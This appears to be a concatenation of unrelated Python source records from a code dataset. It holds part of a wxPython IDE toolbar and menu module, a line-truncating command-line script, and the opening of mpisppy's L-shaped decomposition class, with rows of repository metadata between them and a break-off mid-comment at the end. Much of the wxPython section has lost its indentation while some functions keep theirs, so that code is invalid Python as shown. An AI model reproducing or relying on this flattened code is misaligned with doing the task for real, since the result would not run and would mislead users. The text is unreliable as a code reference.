(ID_CREATE_DYNAMIC_WEB_PROJECT, "Create a Dynamic Web Project", "create_dynamic_web_project.png", "Create a Dynamic Web Project", self.onRunAsMenu, True, ['java ee'], True, wx.ITEM_NORMAL),
(ID_CREATE_NEW_SERVLET, "Create a New Servlet", "create_new_servlet.png", "Create a New Servlet", self.onRunAsMenu, True, ['java ee'], True, wx.ITEM_NORMAL),
(ID_OPEN_TYPE, "Open Type", "opentype.png", "Open Type", self.onOpenTerminal, False, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_OPEN_TASK, "Open Task (Ctrl+F12)", "open_task.png", "Open Task (Ctrl+F12)", self.onOpenTask, False, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_SEARCH, "Search", "searchres.png", "Search", self.onOpenSearch, True, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_LAST_EDIT, "Last Edit Location", "last_edit_pos.png", "Last Edit Location", self.onOpenTerminal, False, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_BACKWARD, "Back", "backward_nav.png", "Back", self.onOpenTerminal, True, ['python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_FORWARD, "Forward", "forward_nav.png", "Forward", self.onOpenTerminal, True, ['python', 'java', 'debug'], False, wx.ITEM_NORMAL),
(ID_newConnection, "New Connection", "connect.png", "New Connection", None, False, ['database'], True, wx.ITEM_NORMAL),
(ID_openConnection, "Open Connection", "database_connect.png", 'Open Connection', None, False, ['database'], True, wx.ITEM_NORMAL),
(ID_newWorksheet, "Script", "script.png", 'Open a new script worksheet', None, False, ['database'], True, wx.ITEM_NORMAL),
(ID_ADD_BOOK, "Add Book", "add_book_16.png", 'Add Book', lambda e: self.onCalibre(e), True, ['calibre'], True, wx.ITEM_NORMAL),
(ID_EDIT_BOOK_METADATA, "Edit Book metadata", "edit_book_16.png", 'Edit Book metadata', lambda e: self.onCalibre(e), True, ['calibre'], True, wx.ITEM_NORMAL),
(ID_CONVERT_BOOK, "Convert Book", "txn_config.png", 'Convert Book', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
(ID_REMOVE_BOOK, "Remove Book", "remove_books_16.png", 'Remove Book', lambda e: self.onCalibre(e), False, ['calibre'], True,wx.ITEM_NORMAL),
(ID_GET_BOOK, "Get Book", "store_16.png", 'Get Book', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
(ID_CONNECT_SHARE_BOOK, "Connect Share", "connect_share_on_16.png", 'Connect Share', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
(ID_RELOAD_BOOK, "Reload Books", "resultset_refresh.png", 'Reload Books', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
# (wx.ID_PREFERENCES, "Preferences", "preference.png", 'Preference', None),
]
if len(self.toolbarItems) == 0:
for tool in tools:
if len(tool) == 0:
toobar.AddSeparator()
# elif perspectiveName in tool[6]:
else:
logger.debug(tool)
state = tool[7]
if tool[8] == wx.ITEM_RADIO:
toolItem = toobar.AddToggleTool(tool[0], self.fileOperations.getImageBitmap(imageName=tool[2]), wx.NullBitmap, toggle=True, short_help_string=tool[3])
if tool[8] == wx.ITEM_CHECK:
toolItem = toobar.AddToggleTool(tool[0], self.fileOperations.getImageBitmap(imageName=tool[2]), wx.NullBitmap, toggle=True, short_help_string=tool[3])
toolItem.__setattr__('toggle', False)
toolItem.SetState(AUI_BUTTON_STATE_NORMAL)
toolItem.SetKind(wx.ITEM_CHECK)
elif tool[8] == wx.ITEM_NORMAL:
toolItem = toobar.AddSimpleTool(tool[0], tool[1], self.fileOperations.getImageBitmap(imageName=tool[2]), short_help_string=tool[3], kind=tool[8])
if state:
toolItem.state &= ~aui.AUI_BUTTON_STATE_DISABLED
else:
toolItem.state |= aui.AUI_BUTTON_STATE_DISABLED
if tool[4]:
self.Bind(wx.EVT_MENU, tool[4], tool[0])
if tool[5]:
toobar.SetToolDropDown(tool[0], tool[5])
self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=tool[0])
##############################################################
for tool in toobar._items:
self.toolbarItems[tool.GetId()] = tool
toobar._items.clear()
if self._ctrl:
self._ctrl.Hide()
for tool in tools:
if len(tool) != 0 and perspectiveName in tool[6]:
try:
if perspectiveName=='calibre':
toobar._items.append(self.toolbarItems[tool[0]])
else:
toobar._items.append(self.toolbarItems[tool[0]])
except Exception as e:
logger.error(e)
logger.error(tool[0], tool)
toobar.Realize()
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_NEW)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_RUN_AS_MENU)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_DEBUG_AS_MENU)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_NEW_JAVA_CLASS)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_CREATE_DYNAMIC_WEB_PROJECT)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_CREATE_NEW_SERVLET)
return toobar
def onCalibre(self, event):
# logger.debug(f'onCalibre {event.Id}')
viewToolbar = self._mgr.GetPane("viewToolbar").window
if event.Id == ID_RELOAD_BOOK:
logger.debug(f'ID_RELOAD_BOOK')
item=viewToolbar.FindTool(ID_RELOAD_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
pub.sendMessage('reloadingDatabase', event=event)
if event.Id == ID_ADD_BOOK:
logger.debug(f'ID_ADD_BOOK')
item=viewToolbar.FindTool(ID_ADD_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_EDIT_BOOK_METADATA:
logger.debug(f'ID_EDIT_BOOK_METADATA')
item=viewToolbar.FindTool(ID_EDIT_BOOK_METADATA)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_CONVERT_BOOK:
logger.debug(f'ID_CONVERT_BOOK')
item=viewToolbar.FindTool(ID_CONVERT_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_REMOVE_BOOK:
logger.debug('ID_REMOVE_BOOK')
item=viewToolbar.FindTool(ID_REMOVE_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
# toolRemove.state =aui.AUI_BUTTON_STATE_NORMAL
# pub.sendMessage('ID_REMOVE_BOOK', event=ID_REMOVE_BOOK)
if event.Id == ID_GET_BOOK:
logger.debug(f'ID_GET_BOOK')
item=viewToolbar.FindTool(ID_GET_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_CONNECT_SHARE_BOOK:
logger.debug(f'ID_CONNECT_SHARE_BOOK')
viewToolbar.Realize()
self._mgr.Update()
    def onOpenTerminal(self, event):
        # Placeholder handler (also reused by many unrelated tools above);
        # currently only logs the triggering tool id.
        logger.debug(f'onOpenTerminal {event.Id}')
def onSkipAllBreakPoints(self, event):
logger.debug(f'onSkipAllBreakPoints {event.Id}')
event.GetEventObject()._tip_item
# event.GetEventObject()._tip_item.__setattr__(toggle,False)
if event.GetEventObject()._tip_item.toggle:
# event.GetEventObject()._tip_item.SetBitmap(event.GetEventObject()._tip_item.GetBitmap())
event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_NORMAL)
else:
event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_PRESSED)
event.GetEventObject()._tip_item.toggle = not event.GetEventObject()._tip_item.toggle
event.GetEventObject().GetToolToggled(event.GetEventObject()._tip_item.GetId())
# event.GetEventObject().GetToolToggled(event.GetEventObject()._tip_item.GetId())
event.GetEventObject().Refresh(True)
event.GetEventObject().Update()
# if event.GetEventObject()._tip_item.GetState() != AUI_BUTTON_STATE_NORMAL:
# event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_NORMAL)
# else:
# event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_PRESSED)
    def onOpenTask(self, event):
        # Placeholder for the 'Open Task' tool; currently only logs.
        logger.debug('onOpenTask')
    def onOpenSearch(self, event):
        # Placeholder for the 'Search' tool; currently only logs.
        logger.debug('onOpenSearch')
    def onRunAsMenu(self, event):
        # Placeholder for the 'Run As...' tool; currently only logs.
        logger.debug('onRunAsMenu')
def onNewMenu(self, event):
logger.debug('onNewMenu')
newFileframe = NewFlowFrame(self, 'New', selectedPath="c:\work\python-project")
newFileframe.CenterOnScreen()
newFileframe.Show()
# def onSave(self, event):
# logger.debug('onSave1')
# viewToolbar = self._mgr.GetPane("viewToolbar")
# toolSave=viewToolbar.window.FindTool(ID_SAVE)
# toolSave.state =aui.AUI_BUTTON_STATE_DISABLED
# self._mgr.Update()
# def onSaveAll(self, event):
# logger.debug('onSaveAll1')
# viewToolbar = self._mgr.GetPane("viewToolbar")
# toolSaveAll=viewToolbar.window.FindTool(ID_SAVE_ALL)
# toolSaveAll.state =aui.AUI_BUTTON_STATE_DISABLED
# toolSave=viewToolbar.window.FindTool(ID_SAVE)
# toolSave.state =aui.AUI_BUTTON_STATE_DISABLED
# self._mgr.Update()
def onRunDebugAsDropDown(self, event):
    """Show a drop-down popup menu under the toolbar button that was clicked.

    The menu contents are chosen by the tool id that fired the event.
    Each entry in ``baseList`` is either ``[]`` (a separator) or
    ``[menu_id, label, icon_filename_or_None, None]``.
    """
    if event.IsDropDownClicked():
        tb = event.GetEventObject()
        # Keep the button visually depressed while the menu is open.
        tb.SetToolSticky(event.GetId(), True)
        baseList = list()
        if event.Id == ID_RUN_AS_MENU:
            baseList = [
                [],
                [ID_RUN_AS, 'Run As', None, None],
                [ID_RUN_CONFIG, 'Run Configurations...', None, None],
                [ID_ORGANIZE_FAVORITES, 'Organize Favorites..', None, None],
            ]
        elif event.Id == ID_DEBUG_AS_MENU:
            baseList = [
                [],
                [ID_DEBUG_AS, 'Debug As', None, None],
                [ID_DEBUG_CONFIG, 'Run Configurations...', None, None],
                [ID_ORGANIZE_FAVORITES, 'Organize Favorites..', None, None],
            ]
        elif event.Id == ID_ADD_BOOK:
            baseList = [
                [],
                [wx.NewIdRef(), 'Add book from directory', "new_testcase.png", None],
            ]
        elif event.Id == ID_NEW_JAVA_CLASS:
            baseList = [
                [],
                [ID_JUNIT_TEST_CASE, 'Junit Test Case', "new_testcase.png", None],
                [ID_CLASS, 'Class', 'newclass_wiz.png', None],
                [ID_INTERFACE, 'Interface', 'newint_wiz.png', None],
                [ID_ENUM, 'Enum', 'newenum_wiz.png', None],
                [ID_ANNOTATION, 'Annotation', 'newannotation_wiz.png', None],
                [ID_JAX_WS_HANDLER, 'JAX-WS Handler', 'jax_ws.png', None],
            ]
        elif event.Id == ID_CREATE_DYNAMIC_WEB_PROJECT:
            baseList = [
                [],
                [ID_DYNAMIC_WEB_PROJECT, 'Dynamic Web Project', 'create_dynamic_web_project.png', None],
                [ID_WEB_FRAGMENT_PROJECT, 'Web Fragment Project', 'web_fragment_prj.png', None],
                [ID_EJB_PROJECT, 'EJB Project', 'ejb_project.png', None],
                [ID_ENTERPRISE_APP_PROJECT, 'Enterprise Application Project', 'enterprise_app.png', None],
                [ID_APP_CLIENT_PROJECT, 'Application Client Project', 'app_client_prj.png', None],
                [ID_CONNECTER_PROJECT, 'Connecter Project', 'connecter_prj.png', None],
                [ID_UTILITY_PROJECT, 'Utility Project', 'java_lib_obj.png', None],
            ]
        elif event.Id == ID_CREATE_NEW_SERVLET:
            baseList = [
                [],
                [ID_SERVLET, 'Servlet', 'create_new_servlet.png', None],
                [ID_FILTER, 'Filter', 'filter.png', None],
                [ID_LISTENER, 'Listener', 'listener.png', None],
                [ID_SESSION_BEAN, 'Session Bean', 'session_bean.png', None],
                [ID_MESSAGE_DRIVEN_BEAN, 'Message-Driven Bean', 'message_driven_bean.png', None],
                [ID_EJB_TIMER, 'EJB Timer', 'session_bean.png', None],
                [ID_JPA_ENTITY, 'JPA entity', 'eclipseLink_dynamic_entity.png', None],
                [ID_JPA_ORM_MAPPING_FILE, 'JPA ORM Mapping File', 'jpa_orm_mapping.png', None],
                [ID_ECLIPSE_LINK_ORM_MAPPING_FILE, 'Eclipse Link ORM Mapping File', 'jpa_orm_mapping.png', None],
                [ID_XDOCKLET_ENTERPRISE_JAVA_BEAN, 'XDocklet Enterprise Java Bean', 'xdoclet_ejb.png', None],
                [ID_ECLIPSELINK_DYNAMIC_ENTITY, 'EclipseLink Dynamic Entity', 'eclipseLink_dynamic_entity.png', None],
            ]
        elif event.Id == ID_NEW:
            # "New" reuses the item list registered for the active perspective.
            baseList = menuItemList[self.selectedPerspectiveName]
        menuItemListx = {
            self.selectedPerspectiveName: baseList
        }
        # create the popup menu from the selected specs
        menuPopup = self.createMenuByPerspective(menuItemList=menuItemListx, perspectiveName=self.selectedPerspectiveName)
        # line up our menu with the button
        rect = tb.GetToolRect(event.GetId())
        pt = tb.ClientToScreen(rect.GetBottomLeft())
        pt = self.ScreenToClient(pt)
        self.PopupMenu(menuPopup, pt)
        # make sure the button is "un-stuck"
        tb.SetToolSticky(event.GetId(), False)
def createMenuByPerspective(self, menuItemList=None, perspectiveName='python'):
    """Build a wx popup menu from the item specs registered for *perspectiveName*.

    Each spec is ``[id, label, icon_or_None, ...]``; a spec of length <= 1
    produces a separator instead of a menu item.
    """
    popup = wx.Menu()
    for spec in menuItemList[perspectiveName]:
        if len(spec) <= 1:
            popup.AppendSeparator()
            continue
        item = wx.MenuItem(popup, spec[0], spec[1])
        if spec[2]:
            item.SetBitmap(self.fileOperations.getImageBitmap(imageName=spec[2]))
        popup.Append(item)
        self.Bind(wx.EVT_MENU, lambda e: self.onRightClickMenu(e), id=spec[0])
    return popup
def creatingFileExplorer(self):
    """Create and return the file-browser pane."""
    return FileBrowser(self, size=(200, 300))
def creatingTreeCtrl(self):
    """Create and return the data-source tree pane."""
    return DataSourcePanel(self)
def getWorksheet(self, dataSourceTreeNode=None):
    """Create a worksheet panel (with toolbar) bound to *dataSourceTreeNode*."""
    return CreatingWorksheetWithToolbarPanel(
        self, -1,
        style=wx.CLIP_CHILDREN | wx.BORDER_NONE,
        dataSourceTreeNode=dataSourceTreeNode,
    )
def constructCenterPane(self):
    """Create the tabbed worksheet panel used as the center pane."""
    return CreateWorksheetTabPanel(self)
def sqlConsoleOutputPane(self):
    """Create the SQL console output pane."""
    return SqlConsoleOutputPanel(self)
def constructHistoryPane(self):
    """Create the query-history grid pane."""
    return HistoryGrid(self)
def CreateSizeReportCtrl(self, width=80, height=80):
    """Create a SizeReportCtrl of the given size, wired to this frame's AUI manager."""
    return SizeReportCtrl(
        self, -1, wx.DefaultPosition, wx.Size(width, height), self._mgr
    )
class SizeReportCtrl(wx.PyControl):
    """Debug control that paints its own client size and, when an AUI manager
    is supplied, the dock layer/direction/row/position/proportion of its pane.
    """

    def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
                 size=wx.DefaultSize, mgr=None):
        wx.PyControl.__init__(self, parent, id, pos, size, wx.NO_BORDER)
        # AUI manager used to look up this control's pane info (may be None).
        self._mgr = mgr
        # NOTE(review): EVT_PAINT binding is commented out, so OnPaint is
        # currently never invoked by the event system.
        # self.Bind(wx.EVT_PAINT, self.OnPaint)
        self.Bind(wx.EVT_SIZE, self.OnSize)
        self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnEraseBackground)

    def OnPaint(self, event):
        """Draw the size string, a cross, and (if available) pane placement info."""
        dc = wx.PaintDC(self)
        size = self.GetClientSize()
        s = ("Size: %d x %d") % (size.x, size.y)
        dc.SetFont(wx.NORMAL_FONT)
        w, height = dc.GetTextExtent(s)
        height = height + 3
        # white background with a light grey X across the whole client area
        dc.SetBrush(wx.WHITE_BRUSH)
        dc.SetPen(wx.WHITE_PEN)
        dc.DrawRectangle(0, 0, size.x, size.y)
        dc.SetPen(wx.LIGHT_GREY_PEN)
        dc.DrawLine(0, 0, size.x, size.y)
        dc.DrawLine(0, size.y, size.x, 0)
        # five text lines are stacked, centered as a block
        dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2))
        if self._mgr:
            pi = self._mgr.GetPane(self)
            s = ("Layer: %d") % pi.dock_layer
            w, h = dc.GetTextExtent(s)
            dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2) + (height * 1))
            s = ("Dock: %d Row: %d") % (pi.dock_direction, pi.dock_row)
            w, h = dc.GetTextExtent(s)
            dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2) + (height * 2))
            s = ("Position: %d") % pi.dock_pos
            w, h = dc.GetTextExtent(s)
            dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2) + (height * 3))
            s = ("Proportion: %d") % pi.dock_proportion
            w, h = dc.GetTextExtent(s)
            dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2) + (height * 4))

    def OnEraseBackground(self, event):
        # intentionally empty: suppresses default erase to avoid flicker
        pass

    def OnSize(self, event):
        # repaint on every resize so the reported size stays current
        self.Refresh()
        event.Skip()
| 47.589021 | 237 | 0.595479 | 6,624 | 64,150 | 5.596014 | 0.129378 | 0.010386 | 0.013219 | 0.012464 | 0.460586 | 0.390579 | 0.352568 | 0.311724 | 0.278245 | 0.265809 | 0 | 0.007771 | 0.287872 | 64,150 | 1,347 | 238 | 47.62435 | 0.803647 | 0.219111 | 0 | 0.300842 | 0 | 0 | 0.103892 | 0.012408 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067389 | false | 0.002407 | 0.033694 | 0 | 0.134777 | 0.013237 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfc96dc65fba4dfeccca21923ae5c19d56187622 | 1,042 | py | Python | pyscripts/truncate_lines.py | joseph62/Scripts | 13aab2a51957894f4d524b7a868cb7e51dbba980 | [
"MIT"
] | null | null | null | pyscripts/truncate_lines.py | joseph62/Scripts | 13aab2a51957894f4d524b7a868cb7e51dbba980 | [
"MIT"
] | null | null | null | pyscripts/truncate_lines.py | joseph62/Scripts | 13aab2a51957894f4d524b7a868cb7e51dbba980 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
import sys
import argparse
import signal
DEFAULT_LINE_LENGTH = 80
def parse_arguments(args):
    """Parse command-line arguments.

    Args:
        args: list of argument strings (typically ``sys.argv[1:]``).

    Returns:
        argparse.Namespace with ``length`` (int) and ``suffix`` (str).
    """
    parser = argparse.ArgumentParser(
        description="Truncate incoming lines to a specified length with an optional suffix"
    )
    parser.add_argument(
        "-l",
        "--length",
        help="The maximum length of each line",
        type=int,
        # Use the module-level constant instead of repeating the magic number 80.
        default=DEFAULT_LINE_LENGTH,
    )
    parser.add_argument(
        "-s",
        "--suffix",
        help="A suffix to add to the end of truncated lines",
        default="",
    )
    return parser.parse_args(args)
def truncate_lines_from_handle(handle, length, suffix):
    """Yield each line from *handle*, shortened to at most *length* characters.

    A line longer than *length* is cut so that, with *suffix* appended, the
    result is exactly *length* characters; shorter lines pass through as-is.
    """
    cutoff = length - len(suffix)
    for line in handle:
        if len(line) <= length:
            yield line
        else:
            yield f"{line[:cutoff]}{suffix}"
def main(args):
    """Read stdin line by line, truncate each line, and print the results.

    Returns 0 (process exit status).
    """
    args = parse_arguments(args)
    for line in truncate_lines_from_handle(sys.stdin, args.length, args.suffix):
        # Lines read from stdin keep their trailing newline while truncated
        # lines have lost it; strip it here so print() does not emit a blank
        # line after every non-truncated line.
        print(line.rstrip("\n"))
    return 0
if __name__ == "__main__":
    # Restore default SIGPIPE handling so piping into e.g. `head` exits
    # quietly instead of raising BrokenPipeError.
    # NOTE(review): signal.SIGPIPE is POSIX-only; this line fails on Windows.
    signal.signal(signal.SIGPIPE, signal.SIG_DFL)
    sys.exit(main(sys.argv[1:]))
| 22.652174 | 90 | 0.642035 | 137 | 1,042 | 4.722628 | 0.467153 | 0.046368 | 0.055641 | 0.071097 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008906 | 0.245681 | 1,042 | 45 | 91 | 23.155556 | 0.814249 | 0.021113 | 0 | 0.0625 | 0 | 0 | 0.20314 | 0.034347 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0 | 0.09375 | 0 | 0.25 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfcb37f297e73011c6f83e4feb6d86e5b96b07bc | 30,944 | py | Python | mpisppy/opt/lshaped.py | Matthew-Signorotti/mpi-sppy | 5c6b4b8cd26af517ff09706d11751f2fb05b1b5f | [
"BSD-3-Clause"
] | null | null | null | mpisppy/opt/lshaped.py | Matthew-Signorotti/mpi-sppy | 5c6b4b8cd26af517ff09706d11751f2fb05b1b5f | [
"BSD-3-Clause"
] | null | null | null | mpisppy/opt/lshaped.py | Matthew-Signorotti/mpi-sppy | 5c6b4b8cd26af517ff09706d11751f2fb05b1b5f | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2020 by B. Knueven, D. Mildebrath, C. Muir, J-P Watson, and D.L. Woodruff
# This software is distributed under the 3-clause BSD License.
import pyomo.environ as pyo
import mpisppy.utils.sputils as sputils
import numpy as np
import itertools
import time
import sys
import mpisppy.spbase as spbase
from mpisppy import MPI
from pyomo.core.plugins.transform.discrete_vars import RelaxIntegerVars
from mpisppy.utils.sputils import find_active_objective
from mpisppy.utils.lshaped_cuts import LShapedCutGenerator
from mpisppy.spopt import set_instance_retry
from pyomo.core import (
Objective, SOSConstraint, Constraint, Var
)
from pyomo.core.expr.visitor import identify_variables
from pyomo.repn.standard_repn import generate_standard_repn
from pyomo.core.expr.numeric_expr import LinearExpression
class LShapedMethod(spbase.SPBase):
    """ Base class for the L-shaped method for two-stage stochastic programs.

        Warning:
            This class explicitly assumes minimization.

        Args:
            options (dict):
                Dictionary of options. Possible (optional) options include

                - root_scenarios (list) - List of scenario names to include as
                  part of the root problem (default [])
                - store_subproblems (boolean) - If True, the BendersDecomp object
                  will maintain a dictionary containing the subproblems created by
                  the BendersCutGenerator.
                - relax_root (boolean) - If True, the LP relaxation of the root
                  problem is solved (i.e. integer variables in the root problem
                  are relaxed).
                - scenario_creator_kwargs (dict) - Keyword args to pass to the scenario_creator.
                - valid_eta_lb (dict) - Dictionary mapping scenario names to valid
                  lower bounds for the eta variables--i.e., a valid lower (outer)
                  bound on the optimal objective value for each scenario. If none
                  are provided, the lower bound is set to -sys.maxsize *
                  scenario_prob, which may cause numerical errors.
                - indx_to_stage (dict) - Dictionary mapping the index of every
                  variable in the model to the stage they belong to.
            all_scenario_names (list):
                List of all scenarios names present in the model (strings).
            scenario_creator (callable):
                Function which take a scenario name (string) and returns a
                Pyomo Concrete model with some things attached.
            scenario_denouement (callable, optional):
                Function which does post-processing and reporting.
            all_nodenames (list, optional):
                List of all node name (strings). Can be `None` for two-stage
                problems.
            mpicomm (MPI comm, optional):
                MPI communicator to use between all scenarios. Default is
                `MPI.COMM_WORLD`.
            scenario_creator_kwargs (dict, optional):
                Keyword arguments to pass to `scenario_creator`.
    """
    def __init__(
        self,
        options,
        all_scenario_names,
        scenario_creator,
        scenario_denouement=None,
        all_nodenames=None,
        mpicomm=None,
        scenario_creator_kwargs=None,
    ):
        super().__init__(
            options,
            all_scenario_names,
            scenario_creator,
            scenario_denouement=scenario_denouement,
            all_nodenames=all_nodenames,
            mpicomm=mpicomm,
            scenario_creator_kwargs=scenario_creator_kwargs,
        )
        if self.multistage:
            raise Exception("LShaped does not currently support multiple stages")
        self.options = options
        self.options_check()
        self.all_scenario_names = all_scenario_names

        self.root = None
        self.root_vars = None
        self.scenario_count = len(all_scenario_names)

        self.store_subproblems = False
        if "store_subproblems" in options:
            self.store_subproblems = options["store_subproblems"]

        self.root_scenarios = None
        if "root_scenarios" in options:
            self.root_scenarios = options["root_scenarios"]

        self.relax_root = False
        if "relax_root" in options:
            self.relax_root = options["relax_root"]

        self.valid_eta_lb = None
        if "valid_eta_lb" in options:
            self.valid_eta_lb = options["valid_eta_lb"]
            self.compute_eta_bound = False
        else: # if the user does not provide a bound, compute one
            self.valid_eta_lb = { scen : (-sys.maxsize - 1) * 1. / len(self.all_scenario_names) \
                                  for scen in self.all_scenario_names }
            self.compute_eta_bound = True

        if scenario_creator_kwargs is None:
            self.scenario_creator_kwargs = dict()
        else:
            self.scenario_creator_kwargs = scenario_creator_kwargs

        self.indx_to_stage = None
        self.has_valid_eta_lb = self.valid_eta_lb is not None
        self.has_root_scens = self.root_scenarios is not None

        if self.store_subproblems:
            # BUG FIX: was `dict.fromkeys(scenario_names)`, which raised
            # NameError (no such local) whenever store_subproblems was True.
            self.subproblems = dict.fromkeys(self.all_scenario_names)
def options_check(self):
    """Validate the user-specified options.

    Required options:
        - root_solver (string): solver to use for the root problem.
        - sp_solver (string): solver to use for the subproblems.

    Missing solver-option dictionaries are filled in with empty dicts.
    """
    for key in ("root_solver_options", "sp_solver_options"):
        if key not in self.options:
            self.options[key] = dict()
    self._options_check(["root_solver", "sp_solver"], self.options)
def _add_root_etas(self, root, index):
    """Attach the eta surrogate variables (one per name in *index*) to *root*,
    each bounded below by its entry in ``self.valid_eta_lb``."""
    lower_bounds = self.valid_eta_lb
    root.eta = pyo.Var(
        index,
        within=pyo.Reals,
        bounds=lambda m, s: (lower_bounds[s], None),
    )
def _create_root_no_scenarios(self):
    """Build the root problem when no scenarios are embedded in it.

    Starts from a copy of the first scenario model, strips out every
    second-stage constraint and variable, adds one eta variable per
    scenario, and rebuilds the objective over first-stage variables
    plus the etas (negated if the model sense is maximization).
    """
    # using the first scenario as a basis
    root = self.scenario_creator(
        self.all_scenario_names[0], **self.scenario_creator_kwargs
    )

    if self.relax_root:
        RelaxIntegerVars().apply_to(root)

    nonant_list, nonant_ids = _get_nonant_ids(root)

    self.root_vars = nonant_list

    # remove any constraint that touches a second-stage variable
    for constr_data in list(itertools.chain(
            root.component_data_objects(SOSConstraint, active=True, descend_into=True)
            , root.component_data_objects(Constraint, active=True, descend_into=True))):
        if not _first_stage_only(constr_data, nonant_ids):
            _del_con(constr_data)

    # delete the second stage variables
    for var in list(root.component_data_objects(Var, active=True, descend_into=True)):
        if id(var) not in nonant_ids:
            _del_var(var)

    self._add_root_etas(root, self.all_scenario_names)

    # pulls the current objective expression, adds in the eta variables,
    # and removes the second stage variables from the expression
    obj = find_active_objective(root)

    repn = generate_standard_repn(obj.expr, quadratic=True)
    if len(repn.nonlinear_vars) > 0:
        raise ValueError("LShaped does not support models with nonlinear objective functions")

    linear_vars = list()
    linear_coefs = list()
    quadratic_vars = list()
    quadratic_coefs = list()
    ## we'll assume the constant is part of stage 1 (wlog it is), just
    ## like the first-stage bits of the objective
    constant = repn.constant

    ## only keep the first stage variables in the objective
    for coef, var in zip(repn.linear_coefs, repn.linear_vars):
        id_var = id(var)
        if id_var in nonant_ids:
            linear_vars.append(var)
            linear_coefs.append(coef)
    # a quadratic term is first-stage only if *both* factors are
    for coef, (x,y) in zip(repn.quadratic_coefs, repn.quadratic_vars):
        id_x = id(x)
        id_y = id(y)
        if id_x in nonant_ids and id_y in nonant_ids:
            quadratic_coefs.append(coef)
            quadratic_vars.append((x,y))

    # checks if model sense is max, if so negates the objective
    if not self.is_minimizing:
        for i,coef in enumerate(linear_coefs):
            linear_coefs[i] = -coef
        for i,coef in enumerate(quadratic_coefs):
            quadratic_coefs[i] = -coef

    # add the etas
    for var in root.eta.values():
        linear_vars.append(var)
        linear_coefs.append(1)

    expr = LinearExpression(constant=constant, linear_coefs=linear_coefs,
                            linear_vars=linear_vars)
    if quadratic_coefs:
        expr += pyo.quicksum(
            (coef*x*y for coef,(x,y) in zip(quadratic_coefs, quadratic_vars))
        )

    root.del_component(obj)

    # set root objective function
    root.obj = pyo.Objective(expr=expr, sense=pyo.minimize)

    self.root = root
def _create_root_with_scenarios(self):
    """Build the root problem with the selected scenarios embedded in it.

    The scenarios listed in ``self.root_scenarios`` become part of the
    root (as an extensive form if there is more than one); eta variables
    are added only for the scenarios that are NOT embedded.
    """
    ef_scenarios = self.root_scenarios

    ## we want the correct probabilities to be set when
    ## calling create_EF
    if len(ef_scenarios) > 1:
        def scenario_creator_wrapper(name, **creator_options):
            # default to a uniform probability if the model carries none
            scenario = self.scenario_creator(name, **creator_options)
            if not hasattr(scenario, '_mpisppy_probability'):
                scenario._mpisppy_probability = 1./len(self.all_scenario_names)
            return scenario
        root = sputils.create_EF(
            ef_scenarios,
            scenario_creator_wrapper,
            scenario_creator_kwargs=self.scenario_creator_kwargs,
        )

        nonant_list, nonant_ids = _get_nonant_ids_EF(root)
    else:
        root = self.scenario_creator(
            ef_scenarios[0],
            **self.scenario_creator_kwargs,
        )
        if not hasattr(root, '_mpisppy_probability'):
            root._mpisppy_probability = 1./len(self.all_scenario_names)

        nonant_list, nonant_ids = _get_nonant_ids(root)

    self.root_vars = nonant_list

    # creates the eta variables for scenarios that are NOT selected to be
